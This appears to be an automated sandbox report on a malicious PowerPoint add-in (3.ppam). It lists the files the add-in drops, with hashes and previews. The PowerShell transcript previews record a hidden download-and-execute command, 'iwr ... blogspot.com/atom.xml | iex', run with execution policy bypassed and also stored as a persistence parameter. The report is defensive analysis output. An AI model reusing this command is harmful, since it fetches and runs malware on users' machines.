                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_toqs3qr1.2zp.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txdgbers.q4d.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucm40ytk.tsg.psm1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzzf3cwh.xmg.ps1
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: 1
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF1369462A1EE99835.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):131072
                                                                                                                                                                      Entropy (8bit):1.081249345282127
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:WImD2929jAfxHh8yQiZSV53HDGyEdaSdE4PS2BpLIJIkAaf:WImB8Hh8yQ8SVN63daSuwIJIkZ
                                                                                                                                                                      MD5:5EE1BAE24EEFA9B3B61DA8815E53E4B7
                                                                                                                                                                      SHA1:A22177BD3176995CCFB2F6531FED73F1DDC4DB52
                                                                                                                                                                      SHA-256:35AFF1285BFAB2AE04EB496B2D8445518BE0EC849EC1FB401D7950E7D2DF1397
                                                                                                                                                                      SHA-512:BC36D1E1FD57340ED29BAB553A9D09753C455C381C1DB2C3A4475EED976C78BFD0D1167B9392474281BF80869ADD48AAAA0EBC8241C6273E11D9CCE22B1D44FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF85570804A0D29ED2.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):30720
                                                                                                                                                                      Entropy (8bit):3.8910597598818932
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:S7afmLYweRiyE4PS2BpknByEdaSaHh8yQiZSV53HDajAfJe9ao+K:lOleRiHX3daSaHh8yQ8SVNeMfK
                                                                                                                                                                      MD5:4F690132943014844147FAB0ED1FE742
                                                                                                                                                                      SHA1:1C6EDD69084960CBA057F758C1BBC2B28B1CF015
                                                                                                                                                                      SHA-256:D400F28E0173699EC66699E19D74986B4802B49387ED4BB882D880B7C9F2DF6F
                                                                                                                                                                      SHA-512:81AF2B5C2E573F3AD8B263B00B296538A4A1DDFB2B82C028704CF14DC7ADA64DD1393FD5925D776B3A10194A3737457362857942E555649AFE7C62D237B57116
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................(............... ...!..."...#...$...%...&...'...).......*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9BC36A1CA590193F.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1536
                                                                                                                                                                      Entropy (8bit):1.1464700112623651
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                      MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                                      SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                                      SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                                      SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF9DBD3B75C3E39F13.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\~DFAD037A81745781F0.TMP
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):61440
                                                                                                                                                                      Entropy (8bit):0.18599931891672755
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2tytja2D7VRFeRLUMS8VfXAU05MAA1lQ/f8EfrCfeaf:2oc2D7DFeRLUGVQnYuf3frCfeaf
                                                                                                                                                                      MD5:3A49E7325E29A24E5D94558792089185
                                                                                                                                                                      SHA1:5CE0F8D7AC8156F8C85B473F94F1B10A0C0F627C
                                                                                                                                                                      SHA-256:7A87C7600A6A08AA03F0F6827C4C4B144CB1F452D121DF80ADCCCA450F2C48BF
                                                                                                                                                                      SHA-512:008A0D75E5B82C5A3FBB942F2DD00692115B3F59F9FC51237D6099630A07997390369F763C1FD2DB4C8E9A222F95D220B3BB939DC0B9C482D90881BDD53357F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Forms\POWERPNT.box
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7168
                                                                                                                                                                      Entropy (8bit):2.4399943770003842
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:rCBwTIfOt4hfcFjO1tTbfcddbf8sD7VRFeRLUMS8VfXAU05MAA1lQ:FTIfOyhfci1bfcPf/D7DFeRLUGVQnY
                                                                                                                                                                      MD5:2BD39DA18ED09D40B478D6118A4ACAF2
                                                                                                                                                                      SHA1:405D796F892395B75C0C186E1328C035D95A4CD9
                                                                                                                                                                      SHA-256:B0B6DBF4AEC184E46B38A8ADF90811E1AA2018A07DBB18145B6BCF10DE80FE05
                                                                                                                                                                      SHA-512:E74CF6C58D5FAEA25B9B5E5824E82756CBC721B95DFAD126811ED0CCA6D85CFFF09E501165123F6C98AB01BDA81744AB8A3E272B7B341A2EB7EC00FB46286709
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3.ppam.LNK
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 23 14:11:42 2021, mtime=Fri Jan 14 19:19:42 2022, atime=Fri Jan 14 19:19:24 2022, length=12137, window=hide
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1013
                                                                                                                                                                      Entropy (8bit):4.67110438699213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8KrzFRUAuElPCH20mMn4q8+W2lSuRZkjAm/w4IroD+vGb5vGl4t2Y+xIBjKZm:8K+mMZnlPRKAmI4zDrbkX7aB6m
                                                                                                                                                                      MD5:2897C03627035D8CBC52A2C0F24B9265
                                                                                                                                                                      SHA1:C3D9DBF969ACBFECDFA40CC1902D4D57A1597840
                                                                                                                                                                      SHA-256:5F1DA4ECB8C7D741C4B8263ADE13D80369A9CAAD14A119063C809CDD3BD97E40
                                                                                                                                                                      SHA-512:8F2995FB700174AE6EBDDB417C1C64096DDE869014D50F95374A90DCB99569F080ECA8DAC3DD4B75CCD4CA63D6EC858F7479F6CA41D02F5EEABF616182A1EE49
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: L..................F.... ......P...................i/...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tf.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....7Swy..user.<.......Ny..Tf......S........................h.a.r.d.z.....~.1.....7S{y..Desktop.h.......Ny..Tf......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.i/...Tm. .359D9~1.PPA.>......7Svy.Tm.....h.....................v~..3...p.p.a.m.......L...............-.......K...........>.S......C:\Users\user\Desktop\3.ppam........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3...p.p.a.m.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj......M..........-..!a..%.H.VZAj......M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sF
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):4.430036532577266
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:bDuMJlaLBCmxWLLBCv:bCjLBsLBs
                                                                                                                                                                      MD5:2268D2C93E8D54B943A1825B500A876C
                                                                                                                                                                      SHA1:64F3A9A7B36D6061859734917CC24198D9557EF6
                                                                                                                                                                      SHA-256:CE4CDEDF18D3FD89461227E4DB3F1CAF43BBF132C743A57E53C5F1D579B6E2C8
                                                                                                                                                                      SHA-512:287D5860D57900E92932EF9F62CCFF86B0FEC70DF1C44AE4A2027F3A173C68E565083E165FE50E2EA698558B42966CFD84177A557F681CDDC615E7FB0A338346
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: [folders]..Templates.LNK=0..3.ppam.LNK=0..[misc]..3.ppam.LNK=0..
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2IDCQDM3N311XDK6HX9H.temp
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7520935693598654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:In8FoCCh51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:rFid6jS2
                                                                                                                                                                      MD5:376A424FAC6B80B4D92D8CE42E6DCEF8
                                                                                                                                                                      SHA1:0747D08FE4257BAB3429B857DC772CAC6A07C3B5
                                                                                                                                                                      SHA-256:456D9460332473F36E7ABF0112154FD46C637C40E68EC0B47A48F0B0B3053A40
                                                                                                                                                                      SHA-512:C04C94428F7396F78011C438D4D07C7A844963E6E59AB159BD117AFD6F0243E5B6DAF332C4194732F937AAE11B9C543BB5D2B525C3F54F4896644E3DC301A5D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.....z.:........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..T.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7520935693598654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:In8FoCCh51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:rFid6jS2
                                                                                                                                                                      MD5:376A424FAC6B80B4D92D8CE42E6DCEF8
                                                                                                                                                                      SHA1:0747D08FE4257BAB3429B857DC772CAC6A07C3B5
                                                                                                                                                                      SHA-256:456D9460332473F36E7ABF0112154FD46C637C40E68EC0B47A48F0B0B3053A40
                                                                                                                                                                      SHA-512:C04C94428F7396F78011C438D4D07C7A844963E6E59AB159BD117AFD6F0243E5B6DAF332C4194732F937AAE11B9C543BB5D2B525C3F54F4896644E3DC301A5D5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.....z.:........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..T.......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H9YDYMUH59Q25R60FLIG.temp
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6205
                                                                                                                                                                      Entropy (8bit):3.7525966087668103
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:InrXFoCCZ51ukvhkvCCtPJbjJ7xvHabgmxvHabgq:aXFil6jS2
                                                                                                                                                                      MD5:75BD9F0789276F7D2087AA9C34FD76E6
                                                                                                                                                                      SHA1:A23E5B2F2351510D042E3D97E8CB1AC596B4BD06
                                                                                                                                                                      SHA-256:03E0096DB6817714AF02502726E83DE2A95825B7FBE390FE322D9354A00E052B
                                                                                                                                                                      SHA-512:6E9F322972BC0DBEF244F1438D2F0621DF778C644B268F44E99D8B2166A66796D76D2A4BC3992793146B0886BE82A0C8F4F05A8022A7890C0FA11A6D0586A286
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: ...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-.....Q.......5........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..Tf......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..Tf......Y....................D1,.R.o.a.m.i.n.g.....\.1......Tv...MICROS~1..D.......Ny..Ty......Y.......................M.i.c.r.o.s.o.f.t.....V.1.....7Swy..Windows.@.......Ny..Tf......Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..Tf......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..Tf......Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.7S.x.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........
                                                                                                                                                                      C:\Users\user\Desktop\~$3.ppam
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):165
                                                                                                                                                                      Entropy (8bit):1.6126637592865871
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Rl/FS6dtt:RtF51
                                                                                                                                                                      MD5:51F16C7DB8702926DCC71B93EE3AD91C
                                                                                                                                                                      SHA1:924D0EF900F88314B241B57514C98F52C2B5C005
                                                                                                                                                                      SHA-256:3B8E674E31B17B169A1C2D5824C1CE02E537E35C44D2F92BC2A34E01E7B22396
                                                                                                                                                                      SHA-512:A4659C31D563D38CA0E8BC309D88C6C8463E0D8C2DED867AD27F2CD618F4C76960C6E86DF7108DE2EA1D771411B3EC7738E11E987FB108763E2B93EA16211AA8
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview: .pratesh. ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      C:\Users\user\Documents\20220114\PowerShell_transcript.651689.83OSY4Al.20220114122046.txt
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1395
                                                                                                                                                                      Entropy (8bit):5.443020028550905
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BxSAyxvBnZx2DOXXlQ2lXWAHjeTKKjX4CIym1ZJXqQ2lQmiuQ81XcVtXcVQk4ST0:BZuvhZoOlQ2UAqDYB1ZwQ26sQeXczXca
                                                                                                                                                                      MD5:FFBE892A6120D6E119CBB62DF19EB808
                                                                                                                                                                      SHA1:ED7C6DC008435A9D5C6103D1DD67A93879C80627
                                                                                                                                                                      SHA-256:D07088792DD34811A4476BA718045388D725143BDE4EBD79E5BD51B32350BF94
                                                                                                                                                                      SHA-512:F57047F97B347364F03471E929B79A9CC18C6CC65F6FB4C320DE981556DC75A52FBE6295AE4BA508592272D19202AA004CDF8A8424B7855165D23DB8F1C00C9E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114122047..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 651689 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr https://p6tbbb.blogspot.com/atom.xml -useB|iex;..Process ID: 6240..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114122047..**********************..PS>start-sleep -s 20;iwr https://p6tbbb.blogspot.com/atom.xml -useB|iex;......NetwrixParam : powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr.. "htt
                                                                                                                                                                      C:\Users\user\Documents\20220114\PowerShell_transcript.651689.LhIXpgD7.20220114121949.txt
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1792
                                                                                                                                                                      Entropy (8bit):5.309583792548154
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:BZkLvhZoOYeqDYB1ZMsQeXczXcXRTXTNNaZZo:BZ0hZN/qDo1ZMeXczXcXRTXxNaZS
                                                                                                                                                                      MD5:4E1B28F68731A1985B766E89C1352174
                                                                                                                                                                      SHA1:6630AB451378B40FE5E1D4758D53BAB93674B2C9
                                                                                                                                                                      SHA-256:46BF4508565D7DDA62B1D61719B9B76B51C9DFFB5ECE1B4275A935954A23B352
                                                                                                                                                                      SHA-512:E28CEAF49F864830CA2818A4777CFFF100919F771A7A2496AB5F7D412E3B2E1596527F1E92468C9BC57900FA0EF8B5F3E1056481366C24A66044D5326BE78376
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114122001..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 651689 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1..Process ID: 6628..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114122002..**********************..PS>C:\Users\user\Pictures\notnice.ps1......NetwrixParam : powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr.. "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;..PSPath : Micros
                                                                                                                                                                      C:\Users\user\Documents\20220114\PowerShell_transcript.651689.TDo_fU7j.20220114122054.txt
                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1395
                                                                                                                                                                      Entropy (8bit):5.447111801300387
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BxSABxvBnZx2DOXXlQ2lXWdHjeTKKjX4CIym1ZJXDNQ2lQmiuQ81XcVtXcVQk4S4:BZjvhZoOlQ2UdqDYB1ZdNQ26sQeXczXF
                                                                                                                                                                      MD5:A92E39DD4705C847D881D73D9C9F12ED
                                                                                                                                                                      SHA1:0BD10D4D2461565CF5498F17BB6FB84E2AE020BA
                                                                                                                                                                      SHA-256:6CAFDF814EF36584B731F4263513B0F2031DA1D93DB151EE181038293D69866C
                                                                                                                                                                      SHA-512:21BEB70357004425E2599DE6C89EA0151A0E7FC9C253B1F45DF48609B43237D5DCF375A6F46CBEE9C4C074FFC3964F2EC517E879A86ADC2116E13426BBA5B178
                                                                                                                                                                      Malicious:false
